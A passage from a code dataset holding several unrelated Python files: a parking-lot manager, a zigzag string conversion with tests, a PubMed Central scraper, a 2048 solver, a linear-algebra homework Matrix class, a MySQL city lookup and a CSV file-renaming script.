'center')\n\nclock()\nmainloop()\n","sub_path":"Clock Using GUI.py","file_name":"Clock Using GUI.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"61481906","text":"parking_slots = {}\n\n\ndef create_parking_slots(number_of_slots):\n \"\"\"Creates the framework for the parking area: one space is created for each of the number_of_slots requested.\n\n Args:\n number_of_slots (str): Initially str, later converted into int, will create 'n' number of spaces in the parking area.\n\n Returns:\n Boolean: Returns True if space is created, else False.\n \"\"\"\n if (number_of_slots is None or number_of_slots == 0):\n print(f\"Cannot create parking slots. Please try again.\")\n return False\n number_of_slots = int(number_of_slots)\n if (isinstance(number_of_slots, int) and number_of_slots > 0):\n for i in range(number_of_slots):\n parking_slots[i + 1] = None\n print(f\"Created Parking of {number_of_slots} slots.\")\n return True\n else:\n print(\n f\"Cannot create slots with {number_of_slots} as input. Please try again. Maybe with a valid number?\"\n )\n return False\n\n\ndef park_vechile(vehicle_id, driver_age):\n \"\"\"Allocates a slot that is closest to the entrance, based on the number plate of the vehicle and the driver's age.\n\n Args:\n vehicle_id (str): Registration plate / number plate of the vehicle that needs to be parked on to a slot in parking area.\n driver_age (str): Age of the driver who parks. \n\n Returns:\n Boolean: Returns True if a parking space is allotted, else False.\n \"\"\"\n if (vehicle_id is None or driver_age is None or int(driver_age) <= 0):\n print(\n f\"Cannot add vehicle : {vehicle_id} with drivers age : {driver_age}. Make sure you have entered valid age and vehicle id.\"\n )\n return False\n driver_age = int(driver_age)\n if (driver_age < 16 or driver_age > 120):\n print(\n f\"The drivers age is suspicious. Please verify the vehicle. The record has been saved anyways.\"\n )\n is_entry_successful = False\n vehicle_ids = []\n for slot_number, details in parking_slots.items():\n if (details is None):\n if (vehicle_id in vehicle_ids):\n print(\n f\"The vehicle : {vehicle_id} is already present in the parking area. You might want to recheck.\"\n )\n return False\n else:\n parking_slots[slot_number] = {\n \"vehicle_id\": vehicle_id,\n \"driver_age\": driver_age\n }\n is_entry_successful = True\n print(\n f\"Vehicle number : {vehicle_id} has been granted slot number {slot_number}.\"\n )\n break\n else:\n vehicle_ids.append(details[\"vehicle_id\"])\n if (not is_entry_successful):\n print(\n f\"Sorry, we cannot grant entrance to {vehicle_id}. The parking lot is full.\"\n )\n return False\n return True\n\n\ndef get_vehicle_ids_by_drivers_age(drivers_age):\n \"\"\"Given the age of the driver, return all the number plates of the vehicle which has drivers of that age.\n\n Args:\n drivers_age (str -> int): Age of the driver\n\n Returns:\n list: Returns list of number plates having drivers with same age. 
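Ages are compared as exact integers (drivers_age is cast with int()). 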
If not driver with that age exists then empty list is returned.\n \"\"\"\n vehicle_ids = []\n if (drivers_age is None):\n return vehicle_ids\n drivers_age = int(drivers_age)\n for slot_number, details in parking_slots.items():\n if (details is not None and int(details[\"driver_age\"]) == drivers_age):\n vehicle_ids.append(details[\"vehicle_id\"])\n if (len(vehicle_ids) > 0):\n print(vehicle_ids)\n else:\n print(f\"No records found for driver age : {drivers_age}\")\n return vehicle_ids\n\n\ndef get_slot_number_by_vehicle_id(vehicle_id):\n \"\"\"Given the number plate of the vehicle find out which slot the vehicle is parked at.\n\n Args:\n vehicle_id (str): Number plate of the vehicle\n\n Returns:\n int: Returns the slot number on which the vehicle is parked at. If not present returns None.\n \"\"\"\n for slot_number, details in parking_slots.items():\n if (details is not None and details[\"vehicle_id\"] == vehicle_id):\n print(f\"Vehicle : {vehicle_id} is present in slot : {slot_number}\")\n return slot_number\n print(f\"Vehicle : {vehicle_id} not found in our parking facility.\")\n return None\n\n\ndef get_slot_number_by_drivers_age(drivers_age):\n \"\"\"Given the drivers age, this method returns the slot numbers for which drivers of that age is present.\n\n Args:\n drivers_age (str -> int): Age of the driver that was used to enter when parking.\n\n Returns:\n list: A list of slot numbers for which drivers of that age is present.\n \"\"\"\n slot_numbers_for_age = []\n if (drivers_age is None):\n return slot_numbers_for_age\n drivers_age = int(drivers_age)\n for slot_number, details in parking_slots.items():\n if (details is not None and int(details[\"driver_age\"]) == drivers_age):\n slot_numbers_for_age.append(slot_number)\n if (len(slot_numbers_for_age) > 0):\n print(slot_numbers_for_age)\n else:\n print(f\"No records found for driver age : {drivers_age}\")\n return slot_numbers_for_age\n\n\ndef clear_parking_space(slot_number):\n \"\"\"Removes the given slot number, marking it as empty and gives the vehicle that just left.\n\n Args:\n slot_number (str -> int): Returns the slot number that was emptied.\n \"\"\"\n slot_number = int(slot_number)\n if (parking_slots[slot_number] is None):\n print(f\"Parking slot number : {slot_number} is already vacant.\")\n return False\n else:\n vehicle_id = parking_slots[slot_number][\"vehicle_id\"]\n parking_slots[slot_number] = None\n print(\n f\"Vehicle_id : {vehicle_id} has left the parking area. 
Slot number : {slot_number} is vacant now.\"\n )\n return True\n\n\ndef get_parking_slot():\n \"\"\"Returns the parking slot object\n\n Returns:\n dict: Parking Slot Object\n \"\"\"\n return parking_slots\n","sub_path":"utilities/core_logic.py","file_name":"core_logic.py","file_ext":"py","file_size_in_byte":6108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"311397205","text":"# The string \"PAYPALISHIRING\" is written in a zigzag pattern on a given number of rows like this: (you may want to display this pattern in a fixed font for better legibility)\n\n# P A H N\n# A P L S I I G\n# Y I R\n\n# 2 rows example:\n# A C E\n# B D\n\n# 4 rows example:\n# A G M\n# B F H L N\n# C E I K O\n# D J\n\n# And then read line by line: \"PAHNAPLSIIGYIR\"\n# Write the code that will take a string and make this conversion given a number of rows:\n\n# string convert(string text, int nRows);\n# convert(\"PAYPALISHIRING\", 3) should return \"PAHNAPLSIIGYIR\".\n\n# Basic idea: fill 2 dimension array, if numRows > 2, then skip `oddCol & (first or last row)`; when oddCol, reverse fill order in that col\nclass Solution(object):\n def convert(self, s, numRows):\n \"\"\"\n :type s: str\n :type numRows: int\n :rtype: str\n \"\"\"\n if s == None or len(s) <= numRows:\n return s\n else:\n ar = []\n for i in range(numRows):\n ar.append([])\n\n # current cursor index of `s`\n sIndex = 0\n # current global travel index\n travel = 0\n while sIndex < len(s):\n col = travel // numRows\n row = travel % numRows\n isOddCol = col % 2 == 1\n\n if numRows <= 2:\n # if numRows less or equal than 2, then don't skip any element\n isSkip = False\n else:\n # if numRows > 2, then skip first and last row in odd col\n isSkip = (row == 0 or row == numRows - 1) and isOddCol\n\n if isOddCol:\n # if odd col, then reverse the order\n row = numRows - 1 - row\n\n if not isSkip:\n ar[row].append(s[sIndex])\n sIndex += 1\n\n travel += 1\n\n return \"\".join(map(\"\".join, ar))\n\n\n# -----------------------------\nimport unittest\n\nclass Test(unittest.TestCase):\n def test(self):\n s = Solution()\n self.assertEqual(s.convert(\"ABC\", 2), \"ACB\")\n self.assertEqual(s.convert(\"ABCDE\", 4), \"ABCED\")\n self.assertEqual(s.convert(\"ABCDEF\", 4), \"ABFCED\")\n self.assertEqual(s.convert(\"PAYPALISHIRING\", 3), \"PAHNAPLSIIGYIR\")\n","sub_path":"src/main/python/zigzag_conversion.py","file_name":"zigzag_conversion.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291966079","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import print_function\r\n# import urllib.request\r\n# import urllib2\r\nimport lxml.html\r\nfrom lxml import etree\r\nimport os\r\n\r\n''' used with urllib.request'''\r\n# def pmcSearch(query, k):\r\n# query = query.strip().replace(\" \",\"+\")\r\n# url = \"http://www.ncbi.nlm.nih.gov/pmc/?term=open+access[filter]+\" + query\r\n# with urllib.request.urlopen(url) as response:\r\n# html = lxml.html.fromstring(response.read())\r\n# result = html.xpath('//dl[@class=\"rprtid\"]/dd')\r\n# output = list()\r\n# for i in range(0,k):\r\n# output.append(result[i].text_content())\r\n# return output\r\n\r\n\r\n'''used with urllib2'''\r\ndef pmcSearch(query, k):\r\n query = query.strip().replace(\" \",\"+\")\r\n url = \"http://www.ncbi.nlm.nih.gov/pmc/?term=open+access[filter]+\" + query\r\n response = urllib2.urlopen(url)\r\n html = lxml.html.fromstring(response.read())\r\n 
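# close the response explicitly once the body has been parsed\r\n 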
response.close()\r\n result = html.xpath('//dl[@class=\"rprtid\"]/dd')\r\n output = list()\r\n if(len(result) == 0):\r\n return output\r\n if k > len(result):\r\n k = len(result)\r\n for i in range(0,k):\r\n output.append(result[i].text_content())\r\n return output\r\n\r\n\r\ndef getTitleOfArticle(file):\r\n tree = etree.parse(file)\r\n root = tree.getroot()\r\n title = root.xpath('//article-title')[0]\r\n return title.text\r\n\r\n\r\n# corpusPath = \"/users/sig/gnguyen/corpus/TREC-CDS-2016/collection/pmc-00/39/\"\r\n# for aFile in os.listdir(corpusPath):\r\n# article_id = \"PMC\"+os.path.basename(aFile).split(\".nxml\")[0]\r\n# title = getTitleOfArticle(corpusPath+aFile)\r\n# resultIdList = pmcSearch(title,5)\r\n# if article_id in resultIdList:\r\n# print(article_id+\": ok\")\r\n# else:\r\n# print(article_id+\": ko\")\r\n\r\n","sub_path":"python/pmc-search/pmc-search.py","file_name":"pmc-search.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"389219196","text":"import sys,copy\nfrom itertools import chain\ninput = sys.stdin.readline\nN = int(input())\n\nboard = [list(map(int,input().split())) for _ in range(N)]\n# Solved by collecting the non-zero values into a list and computing on those.\n# For directions U and D, rotate the board 90 degrees to the left, compute, then rotate it back to the right.\ndef rotate(board,direction):\n rotated = [[0]*N for _ in range(N)]\n if direction == 'R':\n for i in range(N):\n for j in range(N):\n rotated[i][j] = board[N-j-1][i]\n elif direction == 'L':\n for i in range(N):\n for j in range(N):\n rotated[i][j] = board[j][N-i-1]\n return rotated\n\ndef move(dir,board):\n board = copy.deepcopy(board)\n result = []\n if dir =='L' or dir == 'R':\n for i in range(N):\n temp =[]\n # Read row by row, collecting the non-zero values into temp,\n for j in range(N):\n if board[i][j] != 0:\n temp.append(board[i][j])\n # then run temp through the merge function and append the merged row to result.\n result.append(merge(temp,dir))\n elif dir == 'U' or dir =='D':\n # U equals rotating the board 90 degrees left, computing L, then rotating back to the right\n # D equals rotating the board 90 degrees left, computing R, then rotating back to the right\n board = rotate(board,'L')\n for i in range(N):\n temp =[]\n for j in range(N):\n if board[i][j] != 0:\n temp.append(board[i][j])\n if dir =='U':\n result.append(merge(temp,'L'))\n elif dir == 'D':\n result.append(merge(temp,'R'))\n result = rotate(result,'R')\n return result\n\ndef merge(temp,dir):\n made = []\n if dir =='L':\n # iterate up to len(temp)-1, comparing each value with the next one\n for i in range(len(temp)-1):\n # if they are equal, double the front value and zero out the next one.\n if temp[i] == temp[i+1]:\n temp[i]*=2\n temp[i+1] = 0\n \n # if the value is non-zero, append it to made.\n if temp[i] != 0:\n made.append(temp[i])\n # the last value is not handled inside the for loop, so append it if it is non-zero.\n if temp and temp[-1] != 0:\n made.append(temp[-1])\n # pad zeros on the right until the row matches the board size.\n while len(made) != N:\n made.append(0)\n elif dir =='R':\n # same method, but insert is used because the row must be filled from the left\n for i in range(len(temp)-1,0,-1):\n if temp[i] == temp[i-1]:\n temp[i] *= 2 \n temp[i-1] = 0\n if temp[i]!= 0:\n made.insert(0,temp[i])\n if temp and temp[0] != 0:\n made.insert(0,temp[0])\n\n # zeros are likewise padded on the left via insert.\n while len(made) != N:\n made.insert(0,0)\n \n return made\nanswer = 0\n\ndef dfs(board,depth):\n global answer\n # after 5 moves, update the maximum value and stop.\n if depth == 5:\n answer = max(max(list(chain(*board))), answer)\n return\n # copy so the real board is not affected\n copied_board = copy.deepcopy(board)\n dfs(move('R',copied_board), depth+1)\n dfs(move('L',copied_board), depth+1)\n dfs(move('U',copied_board), depth+1)\n dfs(move('D',copied_board), 
depth+1)\n\n\ndfs(board,0)\nprint(answer)\n","sub_path":"2048easy.py","file_name":"2048easy.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363043925","text":"print(\"\"\"\nWhat does this \\a do?\nI don't know\\b sir.\nyeah \\f dude.\nwhat \\r the hell.\n\\v bro.\"\"\")\n\nfor i in range(0, 5):\n if i == 3:\n break\n if i == 0:\n continue\n print(i)\n\ndef main(a, b):\n try:\n d = a / b\n except:\n print(\"Nope.\")\n return\n return d\n if b == 6:\n raise Nosir(\"Bad idea.\")\n\nmain(4, 0)\nmain(4, 6)\nmain(8, 23)\n\nvar = 32\n\ndef new():\n print(var)\ndef old():\n global var\n var = 23\ndef cool():\n var = 43\n\nnew()\nprint(\"Should be 32.\")\nold()\nnew()\nprint(\"Should be 23\")\ncool()\nnew()\nprint(\"Should be 23\")\n\nf = lambda x: x + 2*x*x\nfor i in range(0, 7):\n print(f(i))\n\ndef crap():\n pass\n\nwith open(\"ex15_sample.txt\", \"w\") as my_file:\n my_file.write(\"Hey bro.\")\n\ndef generator():\n for i in range(7):\n yield i**i\ng = generator()\nfor i in g:\n print(i)\n\nprogram = \"m =4 \\nn=10 \\nprint('Sum = ', m*n)\"\nexec(program)\n","sub_path":"ex37.py","file_name":"ex37.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"213546719","text":"from __future__ import annotations\n\nimport copy\nimport typing as t\nfrom array import array\nfrom collections.abc import Iterable\nimport numpy as np\n\nimport lac.vector as vector_ops\nfrom lac import Vector, PRECISION\n\n\nclass Matrix:\n @classmethod\n def from_columnvectors(cls, vectors: t.Iterable[Vector]):\n vectors = list(vectors)\n _validate_vector_dimensions(vectors)\n rowvectors = [Vector(v[i] for v in vectors) for i in range(vectors[0].dim)]\n return cls(rowvectors)\n\n @classmethod\n def make_random(cls, num_rows: int, num_columns: int):\n \"\"\"A Matrix built out of random unit row vectors. 
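The shape of the result is (num_rows, num_columns); a doctest-style sketch:\n\n >>> Matrix.make_random(2, 3).shape\n (2, 3)\n 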
\"\"\"\n return cls(Vector.make_random(num_columns) for _ in range(num_rows))\n\n @classmethod\n def make_identity(cls, num_rows: int, num_columns: int):\n rowvectors = _make_identity_rowvectors(num_rows, num_columns)\n return cls(rowvectors)\n\n @classmethod\n def make_zero(cls, num_rows: int, num_columns: int):\n return cls(Vector.make_zero(num_columns) for _ in range(num_rows))\n\n @classmethod\n def make_row_switching(cls, num_rows: int, num_columns: int, i: int, j: int):\n rowvectors = _make_identity_rowvectors(num_rows, num_columns)\n rowvectors[i], rowvectors[j] = rowvectors[j], rowvectors[i]\n return cls(rowvectors)\n\n @classmethod\n def make_row_multiplying(\n cls, num_rows: int, num_columns: int, i: int, m: t.Union[int, float]\n ):\n rowvectors = _make_identity_rowvectors(num_rows, num_columns)\n rowvectors[i] = m * rowvectors[i]\n return cls(rowvectors)\n\n @classmethod\n def make_row_addition(\n cls, num_rows: int, num_columns: int, i: int, j: int, m: t.Union[int, float]\n ):\n rowvectors = _make_identity_rowvectors(num_rows, num_columns)\n rowvectors[j] = rowvectors[j] + Vector(\n m if j_ == i else 0 for j_ in range(num_columns)\n )\n return cls(rowvectors)\n\n def __init__(self, rowvectors: t.Iterable[t.Union[Vector, t.Iterable[t.Union[int, float]]]]):\n self._rowvectors = [\n Vector(row) if not isinstance(row, Vector) else row for row in rowvectors\n ]\n _validate_vector_dimensions(self._rowvectors)\n\n @property\n def columnvectors(self) -> t.Tuple[Vector, ...]:\n return tuple(self.itercolumns())\n\n @property\n def rowvectors(self) -> t.Tuple[Vector, ...]:\n return tuple(copy.deepcopy(self._rowvectors))\n\n @property\n def num_columns(self) -> int:\n ## homework:start\n return len(self[0])\n ## homework:end\n\n @property\n def num_rows(self) -> int:\n ## homework:start\n return len(self.rowvectors)\n ## homework:end\n\n @property\n def shape(self) -> t.Tuple[int, int]:\n return (self.num_rows, self.num_columns)\n\n @property\n def T(self) -> Matrix:\n if not hasattr(self, \"_T\"):\n ## homework:start\n self._T = Matrix(self.columnvectors)\n ## homework:end\n return self._T\n\n @property\n def determinant(self) -> float:\n if not hasattr(self, \"_det\"):\n ## homework:start\n self._det = 4\n ## homework:end\n return self._det\n\n @property\n def inverse(self) -> Matrix:\n if not hasattr(self, \"_inverse\"):\n ## homework:start\n self._inverse = 2\n ## homework:end\n return self._inverse\n\n @property\n def trace(self) -> float:\n if not hasattr(self, \"_trace\"):\n ## homework:start\n self._trace = 4\n ## homework:end\n return self._trace\n\n def iterrows(self) -> t.Generator[Vector, None, None]:\n for row in self._rowvectors:\n yield copy.copy(row)\n\n def itercolumns(self) -> t.Generator[Vector, None, None]:\n for j in range(self.num_columns):\n yield Vector(self._rowvectors[i][j] for i in range(self.num_rows))\n\n def __eq__(self, other):\n return almost_equal(self, other)\n\n def __matmul__(self, other: Matrix) -> Matrix:\n ## homework:start\n return matrix_multiply(self,other)\n ## homework:end\n\n def __add__(self, other: Matrix) -> Matrix:\n ## homework:start\n return add(self,other)\n ## homework:end\n\n def __rmul__(self, k: t.Union[int, float]) -> Matrix:\n ## homework:start\n return scale(self,k)\n ## homework:end\n\n def __neg__(self) -> Matrix:\n ## homework:start\n return scale(self,-1)\n ## homework:end\n\n def __sub__(self, other: Matrix) -> Matrix:\n ## homework:start\n return subtract(self,other)\n ## homework:end\n\n def __iter__(self):\n return self.iterrows()\n\n def 
__len__(self) -> int:\n return self.num_rows\n\n def __getitem__(self, slice_):\n if isinstance(slice_, int):\n return self._rowvectors[slice_]\n elif isinstance(slice_, slice):\n rowvectors = self._rowvectors[slice_]\n return type(self)(rowvectors)\n elif isinstance(slice_, tuple):\n row, col = slice_\n if isinstance(row, int) and isinstance(col, int):\n return self._rowvectors[row][col]\n elif isinstance(row, slice) and isinstance(col, int):\n return Vector(v[col] for v in self.iterrows())\n elif isinstance(row, int) and isinstance(col, slice):\n return Vector(self._rowvectors[row][col])\n else:\n start, stop, step = self._read_slice(row, self.num_rows)\n rowvectors = (\n self._rowvectors[i][col] for i in range(start, stop, step)\n )\n return type(self)(rowvectors)\n else:\n raise RuntimeError(f\"unsupported slice type {slice_}\")\n\n def __setitem__(self, slice_, value):\n sequence_types = (list, tuple, array, Vector)\n if isinstance(value, sequence_types):\n if len(value) != self.num_columns and len(value) != self.num_rows:\n msg = (\n \"vector has inconsistent dimension, must be number of rows ({}) or \"\n \"number of columns ({})\"\n )\n raise ValueError(msg.format(self.num_rows, self.num_columns))\n error_msg = f\"unsupported combination of slice ({slice_}) and values ({value})\"\n if isinstance(slice_, int):\n self._rowvectors[slice_][:] = value\n elif isinstance(slice_, slice):\n start, stop, step = self._read_slice(slice_, self.num_rows)\n for i in range(start, stop, step):\n self._rowvectors[i][:] = value\n elif isinstance(slice_, tuple):\n row, col = slice_\n if (\n isinstance(row, (int, slice))\n and isinstance(col, (int, slice))\n and isinstance(value, (int, float, *sequence_types))\n ):\n start_row, stop_row, step_row = self._read_slice(row, self.num_rows)\n start_col, stop_col, step_col = self._read_slice(col, self.num_columns)\n\n for i in range(start_row, stop_row, step_row):\n for j in range(start_col, stop_col, step_col):\n if isinstance(value, sequence_types):\n v = value[j]\n else:\n v = value\n self._rowvectors[i][j] = v\n\n else:\n raise TypeError(error_msg)\n else:\n raise TypeError(error_msg)\n\n def _read_slice(self, slice_, max_stop):\n if isinstance(slice_, int):\n start, stop, step = slice_, slice_ + 1, 1\n else:\n start = 0 if slice_.start is None else slice_.start\n stop = max_stop if slice_.stop is None else min(slice_.stop, max_stop)\n step = 1 if slice_.step is None else slice_.step\n return start, stop, step\n\n def __repr__(self):\n index = len(\"Vector(\")\n vals = \"\\n \".join(repr(v)[index:-1] for v in self.iterrows())\n return f\"Matrix(\\n {vals[:-1]}],\\n shape={self.shape}\\n)\"\n\n\ndef _validate_vector_dimensions(vectors: t.Sequence[Vector]) -> None:\n ref = vectors[0].dim\n if not all(v.dim == ref for v in vectors):\n raise ValueError(\n \"vectors do not have the same number of dimensions\"\n )\n\n\ndef _make_identity_rowvectors(num_rows, num_columns):\n rowvectors = []\n for i in range(num_rows):\n components = [0] * num_columns\n if i < num_columns:\n components[i] = 1\n rowvectors.append(Vector(components))\n return rowvectors\n\n\ndef scale(m: Matrix, k: t.Union[int, float]) -> Matrix:\n \"\"\"Scale matrix m by k. \"\"\"\n ## homework:start\n R_List = []\n for i in range(m.num_rows):\n R = []\n for j in range(m.num_columns):\n R.append(m[i][j]*k)\n R_List.append(R)\n output_matrix = Matrix(R_List)\n ## homework:end\n return output_matrix\n\n\ndef add(m1: Matrix, m2: Matrix) -> Matrix:\n \"\"\"Adds two matrices. 
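Assumes m1 and m2 share the same shape; a mismatch is not checked explicitly in this homework sketch. For example:\n\n >>> add(Matrix([[1, 2]]), Matrix([[3, 4]]))[0, 1]\n 6\n 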
\"\"\"\n ## homework:start\n R=[]\n if m1.num_columns==m2.num_columns and m1.num_rows==m2.num_rows:\n for i in range(m1.num_rows):\n R.append([])\n for j in range(m1.num_columns):\n R[i].append(m1[i,j]+m2[i,j])\n \n \n output_matrix = Matrix(R)\n ## homework:end\n return output_matrix\n\n \ndef subtract(m1: Matrix, m2: Matrix) -> Matrix:\n \"\"\"Substracts the second matrix from the first one. \"\"\"\n ## homework:start\n R=[]\n if m1.num_columns==m2.num_columns and m1.num_rows==m2.num_rows:\n for i in range(m1.num_rows):\n R.append([])\n for j in range(m1.num_columns):\n R[i].append(m1[i,j]-m2[i,j])\n \n \n output_matrix = Matrix(R)\n ## homework:end\n return output_matrix\n\n\ndef vector_multiply(m: Matrix, v: Vector, from_left: bool = False) -> Vector:\n \"\"\"Multiplies a matrix with a vector from the right or the left. \"\"\"\n cond1 = m.num_rows != v.dim and from_left\n cond2 = m.num_columns != v.dim and not from_left\n if cond1 or cond2:\n raise ValueError(f\"Shape mismatch: m({m.shape}), v({v.dim})\")\n\n ## homework:start\n\n R = []\n for i in range(m.num_rows):\n R.append(vector_ops.dot(m[i],v))\n output_vector = Vector(R)\n ## homework:end\n return output_vector\n\n\ndef matrix_multiply(m1: Matrix, m2: Matrix) -> Matrix:\n \"\"\"Multiplies two matrices together.\n\n Args:\n m1 (Matrix): Matrx of shape (m,n)\n m2 (Matrix): Matrix of shape (n, k)\n\n Returns:\n (Matrix): The product of m1 and m2, has shape (m, k)\n\n Raises:\n ValueError: if the number of columns in m1 does not match the\n number of rows in m2\n \"\"\"\n if m1.num_columns != m2.num_rows:\n msg = (\n \"num_columns of m1 must equal to num_rows m2, got {} and {} \"\n \"instead\"\n )\n raise ValueError(msg.format(m1.num_columns, m2.num_rows))\n ## homework:start\n R_List = []\n m2T = m2.T\n for i in range(m1.num_rows):\n R = []\n for j in range(m2T.num_rows):\n R.append(vector_ops.dot(m1[i],m2.T[j]))\n R_List.append(R)\n output_matrix = Matrix(R_List)\n ## homework:end\n return output_matrix\n\n\ndef almost_equal(m1: Matrix, m2: Matrix, ndigits: int = PRECISION) -> bool:\n return all(\n vector_ops.almost_equal(v1, v2, ndigits=ndigits) for v1, v2 in zip(m1, m2)\n )\n\n\ndef _validate_matrices_same_dimension(m1: Matrix, m2: Matrix):\n if m1.shape != m2.shape:\n raise ValueError(\n f\"matrices must have equal shape, got {m1.shape} and {m2.shape}\"\n )\n\n\ndef gaussian_elimination(mat: Matrix) -> Matrix:\n raise NotImplementedError\n\n\ndef lu_decomposition(mat: Matrix) -> Matrix:\n raise NotImplementedError\n\n\ndef eigenvalues(mat: Matrix) -> t.List[t.Union[int, float]]:\n raise NotImplementedError\n\n\ndef eigenvectors(mat: Matrix) -> t.List[Vector]:\n raise NotImplementedError\n","sub_path":"lac/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":12079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"57048975","text":"#!/usr/bin/python3\n'''takes name of state as argument and lists cities of that state'''\n\nimport MySQLdb\nfrom sys import argv\n\nif __name__ == \"__main__\":\n db = MySQLdb.connect('localhost', argv[1], argv[2], argv[3], 3306)\n cursor = db.cursor()\n sql = \"SELECT cities.name FROM cities INNER JOIN states\\\n ON cities.state_id = states.id WHERE states.name = %s\"\n cursor.execute(sql, (argv[4],))\n res = cursor.fetchall()\n if len(res) == 0:\n print('')\n for i in range(len(res)):\n if i != (len(res) - 1):\n print(\"{}, \".format(res[i][0]), end=\"\")\n else:\n print(res[i][0])\n 
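# release the database connection once all results have been printed\n 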
db.close()\n","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"6915435","text":"# UPLOAD2_Rename_CSV_Files.py\nimport sys\nargument_count = 3\n\nif len(sys.argv) < argument_count:\n print('expecting '+str(argument_count)+' arguments')\n sys.exit()\n\nprint('sys.argv[0] '+sys.argv[0])\nprint('sys.argv[1] '+sys.argv[1])\nprint('sys.argv[2] '+sys.argv[2])\n\nenvironment_list = ['local','dev','prod']\nif not any(ext in sys.argv[1] for ext in environment_list):\n print('sys.argv[1] '+sys.argv[1]+' not found in environment_list '+', '.join(environment_list))\n sys.exit()\n\nupload_type_list = ['ftp','web']\nif not any(ext in sys.argv[2] for ext in upload_type_list):\n print('sys.argv[2] '+sys.argv[2]+' not found in upload_type_list '+', '.join(upload_type_list))\n sys.exit()\n\nif sys.argv[1] == 'local':\n if sys.argv[2] == 'ftp':\n logging_filename = r'D:\\COW\\WPA\\VFH\\UPLOAD\\log\\local_ftp.log'\n upload_folder = r'D:\\COW\\WPA\\VFH\\UPLOAD\\FTP'\n if sys.argv[2] == 'web':\n logging_filename = r'D:\\COW\\WPA\\VFH\\UPLOAD\\log\\local_web.log'\n upload_folder = r'D:\\COW\\WPA\\VFH\\UPLOAD\\WEB'\nif sys.argv[1] == 'dev':\n logging_filename = r'\\\\cowsvdwx123\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'\\\\cowsvdwx123\\wpaptp\\UPLOAD'\nif sys.argv[1] == 'prod':\n logging_filename = r'\\\\cowsvpwx123\\wpaptp\\log\\wpaptp.log'\n upload_folder = r'\\\\cowsvpwx123\\wpaptp\\UPLOAD'\nprint('logging_filename '+logging_filename)\nprint('upload_folder '+upload_folder)\n\nimport csv\n\nimport os\nimport re\nfrom datetime import datetime\nfrom collections import OrderedDict\n\nreport_name_list = ['MONTHLYTRIP','DETAILTRIP','DRIVERLIST']\n\n# set up logging to file\nimport logging\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=logging_filename,\n filemode='w')\n# define a Handler which writes INFO messages or higher to the sys.stderr\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\n# set a format which is simpler for console use\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n# tell the handler to use this format\nconsole.setFormatter(formatter)\n# add the handler to the root logger\nlogging.getLogger('').addHandler(console)\nlogger1 = logging.getLogger(sys.argv[0])\nlogger1.info('begin processing...')\n\nimport glob\n\nextension = '.csv'\nfor root, dirs, files in os.walk(upload_folder):\n #print(\"root \"+ root)\n #print(\"dirs \")\n #print(dirs)\n #print(\"files \")\n #print(files)\n\n if 'Working' in root:\n print('root '+root)\n for fname in files:\n print('fname '+fname)\n if os.path.splitext(fname)[-1] == extension:\n if not any(ext in fname for ext in report_name_list):\n #print('report_name_list')\n #print(report_name_list)\n \n company_name_dir = root\n print(\"company_name_dir \"+company_name_dir)\n company_name_dir_fname = os.path.join(root, fname) \n print(\"company_name_dir_fname \"+company_name_dir_fname)\n\n logger1 = logging.getLogger(company_name_dir_fname)\n logger1.info('begin processing...')\n\n key_found = False\n\n #with open(company_name_dir_fname, encoding='utf-8') as f:\n with open(company_name_dir_fname) as f:\n try:\n for row in csv.DictReader(f):\n #print(\"row \")\n #print(row)\n od = OrderedDict(row)\n #od.keys()\n print(\"od.keys() 
\")\n print(od.keys())\n \n if 'Lux_VehCount' in od.keys():\n key_found = True\n csv_filetype = 'MONTHLYTRIP'\n\n if 'Transaction_Date' in od.keys():\n key_found = True\n csv_filetype = 'DETAILTRIP'\n\n if 'Driver_License_No' in od.keys():\n key_found = True\n csv_filetype = 'DRIVERLIST'\n \n except UnicodeDecodeError as e:\n print(company_name_dir_fname)\n print(e)\n logger2 = logging.getLogger(company_name_dir_fname)\n logger2.error(e)\n\n print(\"company_name_dir_fname \"+company_name_dir_fname)\n if key_found:\n first_part = company_name_dir_fname.split(\".csv\",1)[0]\n #print('first_part = '+first_part)\n new_fname = first_part+\" - \"+csv_filetype+\".csv\"\n else:\n new_fname = company_name_dir_fname+'.error'\n print('new_fname = '+new_fname)\n\n try:\n os.rename(company_name_dir_fname,new_fname)\n logger1 = logging.getLogger(company_name_dir_fname+' has been renamed to...'+new_fname)\n logger1.info('SUCCESS')\n except FileExistsError as e:\n print(company_name_dir_fname)\n print(e)\n logger2 = logging.getLogger(new_fname)\n logger2.error(e)\n\n logger1 = logging.getLogger(company_name_dir_fname)\n logger1.info('end processing...')\nlogger1 = logging.getLogger(sys.argv[0])\nlogger1.info('end processing...')","sub_path":"WPA/VFH/Python/Scripts/UPLOAD2_Rename_CSV_Files_NEW.py","file_name":"UPLOAD2_Rename_CSV_Files_NEW.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"553964529","text":"book = {}\n\nwith open('/Users/kuma/python/pyq/exam_1st/inout/room.csv',encoding='utf-8') as f:\n for row in f:\n cloumns = row.rstrip().split(',')\n room = 